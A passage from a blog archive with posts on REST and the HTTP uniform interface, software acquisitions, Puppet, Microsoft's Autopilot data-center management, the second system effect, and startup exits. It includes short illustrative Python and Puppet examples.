Over the following years SOAP was embraced by pretty much every major enterprise software vendor and was being pushed hard by the W3C as the way to build distributed applications on the Web. However a lot of these vendors weren't really interested in building software for the Web but instead were more interested in porting all of their technologies and scenarios from enterprise integration technologies like CORBA to using buzzword compliant XML. This led to a bunch of additional specifications like XSD (type system), WSDL (IDL) and UDDI (naming/trading service). Developers initially embraced these technologies enthusiastically which led to the enterprise software vendors pumping out dozens of WS-* specifications. During this period not many thought or talked much about REST since no one talks about boring Ph.D dissertations. 

In 2002, a canary in the coal mine emerged in the form of Mark Baker. On mailing lists frequented by Web services types such as xml-dev and xml-dist-app, Mark began to persistently point out that SOAP was built on a bad foundation because it fundamentally ignored the architecture of the Web as defined by Roy Fielding's thesis. At first a lot of people labeled Mark as a kook or malcontent for questioning the trend of the moment.

By 2005, the industry had enough experience with SOAP to start seeing real problems with using it as a way to build distributed applications on the Web. By that year many developers had started hearing stories like Nelson Minar's presentation on the problems Google had seen with SOAP based Web services and sought a simpler alternative. This is when the seeds of Mark Baker's evangelism of Roy's dissertation eventually bore fruit with the Web developer community.

However a Ph.D dissertation is hard to digest. So the message of REST started getting repackaged into simpler, bite-sized chunks, but the meat of the message started getting lost along the way. This led to several misconceptions about what REST actually is being propagated across the Web developer community.

Misconceptions About the REST Architectural Style

With that out of the way I can address the straw man argument presented in Damien's post. Damien states that building a RESTful Web Service is about using the HTTP PUT and DELETE methods instead of using HTTP POST when designing a Web API. In fact, he goes further to describe it as "the RESTful verb architecture" implying that choice of HTTP verbs that your service supports is the essence of REST.

This is incorrect.

Q: What is the Essence of REST? A: The Uniform Interface

REST explains how the Web works by defining the set of constraints on the various components in the current Web architecture. These constraints include

  • interaction is based on the client-server architectural style. User agents like Web browsers, RSS readers, Twitter clients, etc are examples of Web clients which talk to various Web servers without having a tight coupling to the internal implementation of the server.

  • communication between the client and server is stateless. The benefit of HTTP being a primarily stateless protocol is that statelessness increases the scalability and reliability of services at the cost of introducing some complexity on the part of the client.

  • the Web architecture supports caching by requiring that requests that are cacheable or non-cacheable are labeled as such (i.e. via HTTP method and various caching related headers).

  • there is a uniform interface between components which allows them to communicate in a standard way but may not be optimized for specific application scenarios. There are four interface constraints: identification of resources; manipulation of resources through representations; self-descriptive messages; and, hypermedia as the engine of application state.

  • there can be multiple layers between client and server which act as intermediaries (e.g. proxies, gateways, load balancers, etc) without this being obvious to the requesting client or accepting server.

When you read the above list, the first thing you will note is that it describes the architecture of the World Wide Web. It doesn't describe the architecture of "a typical enterprise" or the internals of a cloud computing application.

Building a RESTful Web Service simply means paying attention to these characteristics of the Web. As you read them, some practical guidelines start becoming obvious. For example, if you want to take advantage of all the caching infrastructure that is built into the Web infrastructure, then you should use HTTP GET for services that retrieve data. This is just one of the many things Web Services built on SOAP got wrong.

The uniform interface constraints describe how a service built for the Web can be a good participant in the Web architecture. These constraints are described briefly as follows

  1. Identification of resources: A resource is any information item that can be named and represented (e.g. a document, a stock price at a given point in time, the current weather in Las Vegas, etc). Resources in your service should be identified using URIs.

  2. Manipulation of resources via representations: A representation is the physical representation of a resource and should correspond to a valid media type. Using standard media types as the data formats behind your service increases the reach of your service by making it accessible to a wide range of potential clients. Interaction with the resource should be based on retrieval and manipulation of the representation of the resource identified by its URI.

  3. Self-descriptive messages: Following the principles of statelessness in your service's interactions, using standard media types and correctly indicating the cacheability of messages via HTTP method usage and control headers ensures that messages are self descriptive. Self descriptive messages make it possible for messages to be processed by intermediaries between the client and server without impacting either.

  4. Hypermedia as the engine of application state: Application state should be expressed using URIs and hyperlinks to transition between states. This is probably the most controversial and least understood of the architectural constraints set forth in Roy Fielding's dissertation. In fact, Fielding's dissertation contains an explicit argument against using HTTP cookies for representing application state to hammer this point home, yet it is often ignored.

Benefits of Conforming to REST and the Uniform Interface to Web Developers

At this point, the benefits of building RESTful services for the Web should be self evident. The Web has a particular architecture and it makes sense that if you are deploying a service or API on the Web then it should take advantage of this architecture instead of fighting against it. There are millions of deployed clients, servers and intermediaries that support REST and it makes sense to be compatible with their expectations.

This doesn't mean you have to use DELETE and PUT when POST might suffice. It does mean understanding what the difference between using POST and using PUT signals to other participants in the Web architecture: specifically, that PUT is idempotent while POST is not, so a client of your service can assume that performing the same PUT two or three times in a row has the same effect as doing it once but cannot assume that for POST. Of course, it is up to you as a Web service developer to decide if you want your service to provide a more explicit contract with clients or not. What is important to note is that there is a practical reason for making the distinction between which HTTP verbs you should support.
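
As a small illustration of what that idempotence guarantee buys you in practice, the sketch below retries a PUT after an ambiguous network failure without worrying about applying it twice, something you cannot safely do with a bare POST. The endpoint and payload are made up and the code uses Python's standard http.client.

import http.client
import json

def put_with_retry(host, path, resource, attempts=3):
    """PUT the full representation of a resource, retrying on transient failures.

    Because PUT is idempotent, replaying the same request after an ambiguous
    failure is safe: two identical PUTs leave the resource in the same state as one.
    """
    body = json.dumps(resource)
    for attempt in range(attempts):
        conn = http.client.HTTPConnection(host, timeout=5)
        try:
            conn.request("PUT", path, body, {"Content-Type": "application/json"})
            response = conn.getresponse()
            if response.status in (200, 201, 204):
                return response.status
        except OSError:
            pass  # the connection dropped mid-request; with POST we couldn't blindly retry
        finally:
            conn.close()
    raise RuntimeError("resource update failed after %d attempts" % attempts)

# Hypothetical endpoint: replace bookmark 42 with a complete new representation.
# put_with_retry("example.com", "/bookmarks/42", {"url": "http://example.org", "title": "Example"})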

There are other practical things to be mindful of as well to ensure that your service is a good participant in the Web ecosystem. These include using GET instead of POST when retrieving a resource, properly utilizing the caching related headers as needed (If-Modified-Since/Last-Modified, If-None-Match/ETag, Cache-Control), learning to utilize HTTP status codes correctly (i.e. errors shouldn't return HTTP 200 OK), keeping your design stateless to enable it to scale more cheaply, and so on. The increased costs, scalability problems and complexity that developers face when they ignore these principles are captured in blog posts and articles all over the Web such as Session State is Evil and Cache SOAP services on the client side. You don't have to look hard to find them. What most developers don't realize is that the problems they are facing arise because they aren't keeping RESTful principles in mind.
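
Conditional GET is a good example of what playing along with those headers looks like in practice. Here's a sketch of a poller that sends If-None-Match and handles 304 Not Modified using Python's standard urllib; the feed URL is a placeholder.

import urllib.error
import urllib.request

def fetch_if_changed(url, etag=None):
    """Fetch a resource only if it has changed since we last saw it.

    Returns (etag, body); body is None when the server answers 304 Not Modified.
    """
    request = urllib.request.Request(url)
    if etag:
        request.add_header("If-None-Match", etag)
    try:
        with urllib.request.urlopen(request) as response:
            return response.headers.get("ETag"), response.read()
    except urllib.error.HTTPError as error:
        if error.code == 304:
            return etag, None  # the cached copy is still good; almost no bytes transferred
        raise  # real failures surface as real status codes, never a 200 with an error payload

# The first poll downloads the feed; later polls are nearly free when nothing has changed.
# etag, body = fetch_if_changed("http://example.com/atom.xml")
# etag, body = fetch_if_changed("http://example.com/atom.xml", etag)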

Don't fight the Web, embrace it.

FURTHER READING

Now Playing: Public Enemy - Don't Believe the Hype


 

cognitive dissonance
n. Psychology.

A condition of conflict or anxiety resulting from inconsistency between one's beliefs and one's actions, such as opposing the slaughter of animals and eating meat.

Now Playing: The Beach Boys - Barbara Ann


 

Categories: Current Affairs

It is a fairly well known fact in the business community that the majority of mergers and acquisitions fail when it comes to increasing shareholder value, benefiting customers or any of the other metrics used to judge the "success" of an acquisition. Whenever you read a news story about some startup being acquired or two large companies merging, there is a greater than 50% chance that the resulting product or company will be of less value to customers and shareholders than if the deal had never happened.

When it comes to software company acquisitions, there are additional factors working against success that go beyond the typical laundry list of reasons given for why M&As usually result in failure. With technology company acquisitions not only is there a minefield of people and financial issues to be dealt with, there is also the real problem of what to do about the technology mismatch that often exists across different companies.

Whenever a large software company acquires a startup, the first order of business is often an attempt to move the startup's application onto the larger company's technology infrastructure so that it can get the benefits of "economies of scale" or some other buzzword that is typically a euphemism for "we bought you so now you're our bitches" rather than something grounded in business realities. This often requires application rewrites that have the unfortunate consequence of causing the shipped application to stagnate as all efforts are poured into recreating the same application using a different technology. In addition, the founders of the startup typically get frustrated with what they [rightfully] deem a pointless exercise and eventually move on to greener pastures. There are a number of examples of this that have occurred in the "Web 2.0" space, as shown below

From Fred Wilson's post We Need A New Path To Liquidity

So if you can't take a company public, how do you get out? M&A has been the primary answer in the web/tech sector for the past eight years. And it's been a great period to sell companies. We've sold three in the past couple years out of our Union Square Ventures portfolio, delicious, FeedBurner, and TACODA, to Yahoo!, Google, and AOL, respectively. Were we happy to take their money? Yes. Were we happy with the outcome? Yes. Were they good buys for their new owners? On the face of it, yes.

But if you look deeper, I wonder. Delicious grew nicely for a while under Yahoo!'s ownership but recently the user base has fallen off pretty dramatically. I double checked this chart in compete and alexa and they all show the dropoff.


Well, what about FeedBurner? Clearly Google has done a good job with that acquisition. Well I am not sure. I don't see any integration between Adwords and FeedBurner yet. I can't buy FeedBurner inventory through Google's text ad interface. I honestly don't see any additional money flowing to me, the publisher of the feed, since the Google acquisition. There's no way to know what the rate of signup by publishers has been since the acquisition, but I wonder if it's increased much.

And TACODA? I know that TACODA had an incredible fourth quarter post the acquisition by AOL, blowing way past the numbers we were projecting in our annual budget. But in the first quarter, AOL fired Curt Viebranz, TACODA's CEO, and many of the top members of the TACODA team are now gone from AOL. Another acquisition messed up.

But who am I to complain? We got paid right? So sit down and shut up.

From Joshua Schachter's comment on "How Yahoo dropped the del.icio.us ball with a pointless 3 year rewrite (from mod_perl to PHP)"

The writer is accidentally correct - we were told that it had to be in PHP to get ops support. Curiously the PHP part didn't take that much time - the majority of the "business logic" is in C++ which took forever and ever to write. I think the open question now is whether the remaining team will be able to innovate or be stuck in complicated codebase hell. 

From Dennis Howlett's article Google Sites - spoiled by usability issues

After 16 months at Google developer’s hands, the outcome is substandard. This is such a pity. In its JotSpot incarnation, it was far from perfect but that didn’t matter because JotSpot was shedding light on a new way of collaborating. Since passing into Google’s hands, the guts have been ripped out and then re-assembled with as much Google ’stuff’ as they could cram in but rushed to completion.

At the very least, Google should get rid of the gadgets addition facility and rework it. Otherwise, I sense the SMBs at which it is aimed will find the service a turn off.

Google has a real chance to differentiate itself from Microsoft - which is clearly what it wants to do, while adding significant numbers of users to its Google Apps offering. It won’t do it this way because despite all the gripes around Microsoft products, the fact is Microsoft offers a more polished experience. Until Google truly understands this, it will find it difficult to adequately compete. In the meantime, offerings like Wetpaint and Ning have little to fear.

From Ryan Paul's article Jaiku users flee to Twitter as a result of Google's neglect

Unfortunately, Google has allowed Jaiku to languish and is now suffering a backlash from frustrated users who are beginning to mass-migrate to Twitter, a competing microblogging service. Jaiku's external feed servers, which are used by third-party Jaiku client applications, have been down frequently during the past week, often returning 504 gateway errors or nothing at all. During the brief stints when the feed servers are operational, they have been extremely slow and often out of sync with the actual content—typically lagging by between four and 13 hours. These problems have been noted by many users and several third-party Jaiku client application developers who discussed the problem with Ars. Users also complain that Jaiku's IM bots and the third-party Jaiku Facebook interface are exhibiting problems as well.

When Google announced the acquisition, the company promised new features within a few months, but we have seen no evidence of any development at all. Registration is still closed and new users can only join the site by receiving an invitation from Google. The Jaiku developers have been completely and totally silent since the announcement of the takeover, and the official Jaiku blog—which used to have several messages a month—has had no new posts at all. The Jaiku Team feed has also not received any posts from Jaiku developers since the acquisition.

The stories are the same except that some of the names are different. A startup gets bought and immediately stops innovating because all their development time is being spent porting the code to a new platform. During that time newer, more agile competitors show up and eat their lunch. The reason I find this such a conundrum is that when you buy a technology startup, you are primarily buying three things

  • customers
  • employees
  • technology

However the standard operating procedure during Web software acquisitions is to discard the technology and consequently tick off the employees who made the product a success in the first place, thus creating an exodus. The application rewrite plus employee exodus leads to product stagnation which eventually leads to lots of pissed off customers. Thus the entire value from the acquisition is effectively thrown away.

This is the default situation when it comes to acquisitions in the software industry. For every successful acquisition like Google + YouTube there are two or three that are more like Google + Dodgeball. So if there is a startup whose product you love that you hear is being acquired by one of the large Web companies, be happy for the founders and be sad for yourself because the product you love is likely going to become a neglected bride.

Disclaimer: I'm an employee of a large software company that has displayed similarly counterproductive tactics when acquiring startups. Although no examples are provided in the post above, I'm sure some can be found from its history of acquisitions.

Now Playing: Dire Straits - Money For Nothing


 

Puppet provides a mechanism for managing a heterogeneous cluster of Unix-like machines using a central configuration system and a declarative scripting language for describing machine configuration. The declarative scripting language abstracts away the many differences in various Unix-like operating systems.

Puppet is used for server management by a number of startups including PowerSet, Joost and Slide.

Typical Puppet Architecture

In a system managed using Puppet, the Puppet Master is the central system-wide authority for configuration and coordination. Manifests are propagated to the Puppet Master from a source external to the system. Each server in the system periodically polls the Puppet Master to determine if its configuration is up to date. If this is not the case, then the new configuration is retrieved and the changes described by the new manifest are applied. The Puppet instance running on each client can be considered to be made up of the following layers

 

Each manifest is described in the Puppet Configuration Language, which is a high level language for describing resources on a server and what actions to take on them. Retrieving the newest manifests and applying the changes they describe (if any) is handled by the Transactional Layer of Puppet. The Puppet Configuration Language is actually an abstraction that hides the differences between various Unix-like operating systems. This abstraction layer maps the various higher level resources in a manifest to the actual commands and file locations on the server's target operating system.

What Does Puppet Do?

The Puppet Master is the set of one or more servers that run the puppetmasterd daemon. This daemon listens for polling requests from the servers being managed by Puppet and returns the current configuration for the server to the machine. Each server to be managed by Puppet must have the Puppet client installed and must run the puppetd daemon, which polls the Puppet Master for configuration information.

Each manifest can be thought of as a declarative script which contains one or more commands (called resources in Puppet parlance) along with their parameters, dependencies and the prerequisites to running each command. Collections of resources can be grouped together as classes (complete with inheritance) which can be further grouped together as modules. See below for examples

Each example below shows a language construct, a sample snippet and a description of what it does.

Resource

service { "apache": require => Package["httpd"] }

The apache resource requires that the httpd package is installed.

Class

class apache {
    service { "apache": require => Package["httpd"] }
    file { "/nfs/configs/apache/server1.conf":
        group => "www-data"
    }
}

Groups together the rule that the apache service requires the httpd package to be installed and the rule that the server1.conf apache configuration file should be owned by the www-data group.

Derived Class

class apache-ssl inherits apache {
    Service[apache] { require +> File["apache.pem"] }
}

The apache-ssl class defines all of the above and additionally declares that the apache service requires the existence of the apache.pem configuration file.

Module

class webserver::apache-ssl inherits apache {
    Service[apache] { require +> File["apache.pem"] }
}

The apache-ssl class is part of the webserver module.

Node

node "webserver.example.com" {
    include webserver
}

Declares that the manifest for the machine named webserver.example.com is the webserver module.

A node describes the configuration for a particular machine given its name. Node names and their accompanying configuration can be defined directly in manifests as shown above. Another option is to use external node classifiers, which provide a dynamic mechanism for determining a machine's type based on its name, or to use an LDAP directory for storing information about nodes in the cluster.
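
As I understand Puppet's external node support, the classifier is just a script that the Puppet Master invokes with the node's name as its only argument and that prints a YAML hash of classes (and optionally parameters) to stdout, exiting non-zero for unknown nodes. The sketch below is a minimal, hypothetical classifier in Python; the hostname convention, role map, class names and the PyYAML dependency are all assumptions made for illustration.

#!/usr/bin/env python
# Hypothetical external node classifier: maps a machine's hostname to the Puppet
# classes it should receive. Assumes Puppet passes the node name as the script's
# only argument and expects a YAML hash on stdout.
import sys
import yaml  # PyYAML

# Assumed convention: the machine's role is encoded in its hostname prefix,
# e.g. webserver01.example.com, dbserver03.example.com
ROLE_CLASSES = {
    "webserver": ["webserver::apache-ssl"],
    "dbserver":  ["database"],          # hypothetical class name
}

def classify(node_name):
    role = node_name.split(".")[0].rstrip("0123456789")
    classes = ROLE_CLASSES.get(role)
    if classes is None:
        sys.exit(1)                     # unknown node: a non-zero exit tells Puppet we can't classify it
    return {"classes": classes, "parameters": {"datacenter": "us-west"}}

if __name__ == "__main__":
    print(yaml.dump(classify(sys.argv[1]), default_flow_style=False))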

FURTHER READING

  • Puppet Type Reference – List of built-in resource types abstracted by the Puppet configuration language.
  • Puppet Language Tutorial – Introduction to the various language constructs in the Puppet language including classes, modules, conditionals, variables, arrays and functions.

Now Playing: Linkin Park - Cure For The Itch


 

Categories: Web Development

Whenever you read stories about how Web companies like Facebook have 10,000 servers including 1800 database servers or that Google has one million servers, do you ever wonder how the system administrators that manage these services deal with deployment, patching, failure detection and system repair without going crazy? This post is the first in a series of posts that examines some of the technologies that successful Web companies use to manage large Web server farms.

Last year, Michael Isard of Microsoft Research wrote a paper entitled Autopilot: Automatic Data Center Management which describes the technology that Windows Live and Live Search services have used to manage their server farms. The abstract of his paper is as follows

Microsoft is rapidly increasing the number of large-scale web services that it operates. Services such as Windows Live Search and Windows Live Mail operate from data centers that contain tens or hundreds of thousands of computers, and it is essential that these data centers function reliably with minimal human intervention. This paper describes the first version of Autopilot, the automatic data center management infrastructure developed within Microsoft over the last few years. Autopilot is responsible for automating software provisioning and deployment; system monitoring; and carrying out repair actions to deal with faulty software and hardware. A key assumption underlying Autopilot is that the services built on it must be designed to be manageable. We also therefore outline the best practices adopted by applications that run on Autopilot.

The paper provides a high level overview of the system, its design principles and the requirements for applications/services that can be managed by the system. It gives a lot of insight into what it takes to manage a large server farm while keeping management and personnel costs low.

The purpose of AutoPilot is to automate and simplify the basic tasks that system administrators typically perform in a data center. This includes installation and deployment of software (including operating systems and patches), monitoring the health of the system, taking basic repair actions and marking systems as needing physical repair or replacement.

However applications that will be managed by AutoPilot also have their responsibilities. The primary responsibilities of these applications include being extremely fault tolerant (i.e. applications must be able to handle processes being killed without warning) and being capable of continuing to run during large outages in the cloud (i.e. up to 50% of the servers being out of service). In addition, these applications need to be easy to install and configure, which means that they need to be xcopy deployable. Finally, the application developers are responsible for describing which application specific error detection heuristics AutoPilot should use when monitoring their service.

Typical AutoPilot Architecture

 

The above drawing is taken from the research paper. According to the paper, the tasks of the various components are as follows

The Device Manager is the central system-wide authority for configuration and coordination. The Provisioning Service and Deployment Service ensure that each computer is running the correct operating system image and set of application processes. The Watchdog Service and Repair Service cooperate with the application and the Device Manager to detect and recover from software and hardware failures. The Collection Service and Cockpit passively gather information about the running components and make it available in real-time for monitoring the health of the service, as well as recording statistics for off-line analysis. (These monitoring components are "Autopiloted" like any other application, and therefore communicate with the Device Manager and Watchdog Service which provide fault recovery, deployment assistance, etc., but this communication is not shown in the figure for simplicity.)

The typical functioning of the system is described in the following section.

What Does AutoPilot Do?

The set of machine types used by the application (e.g. Web crawler, front end Web server, etc) needs to be defined in a database stored on the Device Manager. A server's machine type dictates what configuration files and application binaries need to be installed on the server. This list is manually defined by the system administrators for the application. The Device Manager also keeps track of the current state of the cluster, including which machines of the various machine types are online and their health status.

The Provisioning Service continually scans the network looking for new servers that have come online. When a new member of the server cluster is detected, the Provisioning Service asks the Device Manager what operating system image it should be running and then images the machine with a new operating system before performing burn-in tests. If the tests are successful, the Provisioning Service informs the Device Manager that the server is healthy. In addition to operating system components, some AutoPilot specific services are also installed on the new server. There is a dedicated filesync service that ensures that the correct files are present on the computer and an application manager that ensures that the expected application binaries are running.

Both services determine what the right state of the machine should be by querying the Device Manager. If the required application binaries and files are not present on the machine then they are retrieved from the Deployment Service. The Deployment Service hosts the various application manifests, which map to the various application folders, binaries and data files. These manifests are populated from the application's build system, which is outside the AutoPilot system.

The Deployment Service also comes into play when a new version of the application is ready to be deployed. During this process a new manifest is loaded into the Deployment Service and the Device Manager informs the various machine types of the availability of the new application bits. Each machine type has a notion of an active manifest, which allows the application bits for a new version to be deployed as an inactive manifest while the old version of the application is still considered "active". The new version of the application is rolled out in chunks called "scale units". A scale unit is a group of multiple machine types which can number up to 500 machines. Partitioning the cluster into scale units allows code roll outs to be staged. For example, if you have a cluster of 10,000 machines with scale units of 500 machines, then AutoPilot could be configured to roll out to at most 5 scale units at a time so that no more than 25% of the cloud is being upgraded at any given moment.
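
To illustrate the staging arithmetic, here is a small, purely illustrative Python sketch (not anything from the Autopilot paper): the cluster is partitioned into fixed-size scale units and an upgrade proceeds in waves of at most a configured number of units.

# Illustrative sketch of a staged rollout using scale units (not Autopilot code).
def scale_units(machines, unit_size=500):
    """Partition the cluster into scale units of at most unit_size machines."""
    return [machines[i:i + unit_size] for i in range(0, len(machines), unit_size)]

def staged_rollout(machines, unit_size=500, max_concurrent_units=5):
    """Yield successive waves of machines so that at most
    max_concurrent_units * unit_size machines are upgrading at once."""
    units = scale_units(machines, unit_size)
    for i in range(0, len(units), max_concurrent_units):
        yield [m for unit in units[i:i + max_concurrent_units] for m in unit]

# Example: a 10,000 machine cluster with 500-machine scale units and at most
# 5 concurrent units upgrades in 4 waves of 2,500 machines (25% of the cloud).
cluster = ["machine%05d" % i for i in range(10000)]
waves = list(staged_rollout(cluster))
assert len(waves) == 4 and all(len(w) == 2500 for w in waves)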

Besides operating system installation and deployment of application components, AutoPilot is also capable of monitoring the health of the service and taking certain repair actions. The Watchdog Service is responsible for detecting failures in the system. It does so by probing each of the servers in the cluster and testing various properties of the machines and the application(s) running on them based on various predetermined criteria. Each watchdog can report one of three results for a test: OK, Warning or Error. A Warning does not initiate any repair action and simply indicates that a non-fatal error has occurred. When a watchdog reports an error back to the Device Manager, the machine is placed in the Failure state and one of the following repair actions is taken: DoNothing, Reboot, ReImage or Replace. The choice of repair action depends on the failure history of the machine. If this is the first error that has been reported on the machine in multiple days or weeks, then it is assumed to be a transient error and the appropriate action is DoNothing. If not, the machine is rebooted, and if after numerous reboots the system is still detected to be in error by the watchdogs, it is re-imaged (a process which includes reformatting the hard drive and reinstalling the operating system as well as redeploying application bits). If none of these steps solve the problem then the machine is marked for replacement and it is picked up by a data center technician during weekly or biweekly sweeps to remove dead servers.
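
The escalating repair policy described above amounts to a small decision procedure. The sketch below renders that logic in Python for illustration only; the thresholds and the shape of the failure history are assumptions of mine, not details from the paper or Autopilot's actual implementation.

from datetime import datetime, timedelta

# Illustrative sketch of the escalating repair policy (not Autopilot's code).
# The quiet period and retry limits below are made-up thresholds.
def choose_repair_action(failure_history, now=None,
                         quiet_period=timedelta(days=7),
                         max_reboots=3, max_reimages=1):
    """Pick a repair action based on how recently and how often this machine has failed.

    failure_history: list of (timestamp, action_taken) tuples for the machine.
    Returns one of "DoNothing", "Reboot", "ReImage" or "Replace".
    """
    now = now or datetime.utcnow()
    recent = [(t, a) for (t, a) in failure_history if now - t < quiet_period]
    if not recent:
        return "DoNothing"   # first error in a long while: assume it was transient
    reboots = sum(1 for _, a in recent if a == "Reboot")
    reimages = sum(1 for _, a in recent if a == "ReImage")
    if reboots < max_reboots:
        return "Reboot"
    if reimages < max_reimages:
        return "ReImage"     # reformat the disk, reinstall the OS, redeploy application bits
    return "Replace"         # mark the machine for the technician's next sweep

# Example: a machine already rebooted three times this week gets re-imaged next.
history = [(datetime.utcnow() - timedelta(hours=h), "Reboot") for h in (1, 5, 20)]
assert choose_repair_action(history) == "ReImage"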

System administrators can also directly monitor the system using data aggregated by the Collection Service, which gathers information from various performance counters. This data is written to a large-scale distributed file store for offline data mining and to a SQL database where it can be visualized as graphs and reports in a visualization tool known as the Cockpit.

Now Playing: Nirvana - Jesus Doesn't Want Me For A Sunbeam


 

One of the valuable ideas from Frederick Brooks' classic The Mythical Man Month is the notion of the second system effect when designing software systems. The following is an excerpt from the book where the concept is introduced

An architect’s first work is apt to be spare and clean. He knows he doesn’t know what he’s doing, so he does it carefully and with great restraint.

As he designs the first work, frill after frill and embellishment after embellishment occur to him. These get stored away to be used “next time.” Sooner or later the first system is finished, and the architect, with firm confidence and a demonstrated mastery of that class of systems, is ready to build a second system.

This second is the most dangerous system a man ever designs. When he does his third and later ones, his prior experiences will confirm each other as to the general characteristics of such systems, and their differences will identify those parts of his experience that are particular and not generalizable.

The general tendency is to over-design the second system, using all the ideas and frills that were cautiously sidetracked on the first one.

In my experience, the second system effect doesn't just come into play when the creator(s) of the second system also worked on the first system. In many cases, a development team may be brought in to build a new version of a first system either because they are competitors trying to one up a successful product or they are building the next generation of the technology while the original team goes into "maintenance mode" (i.e. shades of The Soul of a New Machine). In such situations, the builders of the second system can fall into the trap that Frederick Brooks describes in chapter 5 of Mythical Man Month.

At almost any point in time over the past few years, I could easily count about three or four software projects I was personally familiar with that were making classic "second system" mistakes. However instead of vilifying these projects, I thought it would be useful to list the top three things I've seen that have separated second systems that have avoided falling into this trap and those that haven't.

Realize You Can't Do It All In One Release

A lot of projects lose their way because they try to do too much in a single release. As Raymond Chen wrote, "You don't know what you do until you know what you don't do." Until you start focusing on a key set of scenarios your product will nail and start cutting features that aren't necessary to hitting those scenarios, your project isn't ready for prime time. What developers often fail to remember is that there is always another version and you can fit those scenarios in at that point.

One company that gets this idea very well is Apple. I can still remember Cmdr Taco's infamous review of the original iPod when it ran in 2001; "No wireless. Less space than a nomad. Lame." However the iPod nailed its key scenarios and with that success kept expanding its set of key scenarios (more space, video, photos, etc) until it became the cultural juggernaut it is today. You can see the same qualities in the iPhone. Just a few months ago, you'd read articles like Final report: The iPhone is not open for business that argued against the iPhone because it didn't support 3G, lacked Exchange support and had a non-existent developer platform. However the original iPhone was still successful and they addressed these issues in the next version to even greater success.

You Can Be Date Driven or Feature Driven but Not Both

A date driven release is one where everyone on the team is working to hit a particular cutoff date, after which the product will ship with or without their feature. Software products that have to hit the back to school cycle, tax time or the holiday shopping cycle are often date driven. A feature driven software release takes the "we won't ship it until it is ready" approach, which is popular among Open Source projects and at companies like Google (according to Steve Yegge).

The thing to note about both approaches is that they are built on compromise: we will compromise on our ship date but not on our features, or vice versa. Where software projects tend to go awry is when they decide to be both feature driven and date driven, because it means they have left no room to compromise. This is additionally problematic because our industry is so poor at project estimation. So at the start of a project you have features that should take two years to ship budgeted as needing only a year of work. In a date driven release, once this discrepancy is realized, features start getting cut or "placed below the cut line". In a feature driven release, the ship date is pushed out and expectations are adjusted.

Projects that are both feature driven and date driven (i.e. we have to ship features X, Y & Z on date A) end up delaying these decisions until the last minute since they aren't mentally set up to compromise on either the date or the features. This leads to missed deadlines, hastily cut features and demoralization within the product team, and it often continues across multiple deadlines until the team finally feels it must show something for all the missed deadlines and cut features and throws together a mediocre release. We've all seen software projects that have succumbed to this and it is a sad sight to behold.

Don't Lose Track of What Made the First System Successful

Developers tend to be a fairly critical lot so when they look at a successful "first system", they often only see the flaws. This is often what fuels the second system effect and leads to losing sight of why the first system became a hit in the first place. A recent example of this is the search engine Cuil which was started by some former employees of Google with the intent of building a search engine which fixes the issues with Google's search engine. Unfortunately, they had a disastrous product launch which has been documented in blog posts like How To Lose Your Cuil 20 Seconds After Launch and news articles such as Cuil shows us how not to launch a search engine.

When you look back at the PR buildup leading to Cuil's launch, it is interesting to note that even though the Cuil team dubbed themselves "Google slayers", they did not address the key things people like about Google's search. Google provides relevant search results as quickly as possible. Cuil bragged about providing more complete results because their search index was bigger, about showing more results above the fold by going with three columns in their search engine results page, and about offering richer query refinement features than Google. Although all of these are weaknesses in Google's user experience, they are trumped by the fact that Google provides extremely relevant search results. The Cuil team lost sight of this, probably because while working at Google they only ever talked about fixing the flaws in the search product instead of also internalizing what has made it so successful.

This is an extremely common mistake that cuts across all categories of software products.

Now Playing: Young Jeezy - Motivation


 

Categories: Programming

Earlier today I read two posts that were practically mirror opposites of each other. The first was Paul Graham's essay, The Pooled-Risk Company Management Company, where he makes a case against founding a company that you intend to run as a successful business over the long term, and instead for building a company that you can sell to a public company so you can move on and enjoy your money. His argument is excerpted below

At this year's startup school, David Heinemeier Hansson gave a talk in which he suggested that startup founders should do things the old fashioned way. Instead of hoping to get rich by building a valuable company and then selling stock in a "liquidity event," founders should start companies that make money and live off the revenues. Sounds like a good plan. Let's think about the optimal way to do this.

One disadvantage of living off the revenues of your company is that you have to keep running it. And as anyone who runs their own business can tell you, that requires your complete attention. You can't just start a business and check out once things are going well, or they stop going well surprisingly fast.

The main economic motives of startup founders seem to be freedom and security. They want enough money that (a) they don't have to worry about running out of money and (b) they can spend their time how they want. Running your own business offers neither. You certainly don't have freedom: no boss is so demanding. Nor do you have security, because if you stop paying attention to the company, its revenues go away, and with them your income.

The best case, for most people, would be if you could hire someone to manage the company for you once you'd grown it to a certain size.
...
If such pooled-risk company management companies existed, signing up with one would seem the ideal plan for most people following the route David advocated. Good news: they do exist. What I've just described is an acquisition by a public company.

Austin Wiltshire has a counterpoint to Paul Graham's article entitled New hire cannon fodder where he decries the practice of "exploiting" junior developers so that a couple of fat cats with money can get even richer. Parts of Austin's counter argument are excerpted below

Why these large firms, and now even places like YCombinator continually think the best way to move forward in software is to hire as many gullible young naive programmers as possible and work them to death is beyond me.  It’s pretty well known that 80 hour work weeks and inexperience is a guarantee to continually make the same damn mistakes over and over again.  It’s also an open question as to why new hires let these companies take advantage of them so badly.  Paul Graham had a start up, he begged for angel investing, and his life should show you - what does he do now?  Well he learned from his experience that designing and building is for chumps, to make the big bucks and sit on your ass you become an angel investor.

Kids will work for pennies.  You can continue to fill their heads with dreams of having the next big idea, even though they are carrying all the risk for you.  Junior developers, whether entrepreneurs or otherwise, are being asked to give up their 20’s, probably the best, most energetic years of their lives, to have a chance at making a dent in someone else’s bottom line.  (Make note, the one exception here I’ve seen is 37 Signals :) )

But have we never stopped to think who truly is benefiting from all these hours?  Do we get paid more?  No.  In fact, because many of us are salaried, we’re effectively paid less.  Are we compensated with faster promotions?  Possibly - but don’t forget about that silicon ceiling.  The only person who knows how many hours you’re putting in is probably just the guy above you - but he makes sure to show just how productive his department is (via your hard work) to everyone.  He will always get the spoils.  Who will end up really getting the spoils out of any of YCombinator’s work?  Paul Graham.

Both arguments have their merits and there are also parts I disagree with on both sides. Austin is right that YCombinator takes advantage of the naivety of youth. However when you are in your 20s with no serious attachments (like a mortgage, a family or even a sick relative), it doesn't sound like a bad idea to make hay while the sun shines. If you can sacrifice some time in your youth for a chance at a better life for yourself and your future spouse/kids/girlfriend/family/etc in a few years, is it wrong to treat that as an opportunity? Especially if you'll be working in an energetic environment surrounded by likeminded souls all believing that you are building cool stuff? Additionally, if the startup doesn't work out [which it most likely won't], the experience will still turn out to be useful when you decide to get a regular job at some BigCo, even if it is just realizing how good you have it now that you no longer have to work 80 hour weeks while eating Top Ramen for breakfast and dinner.

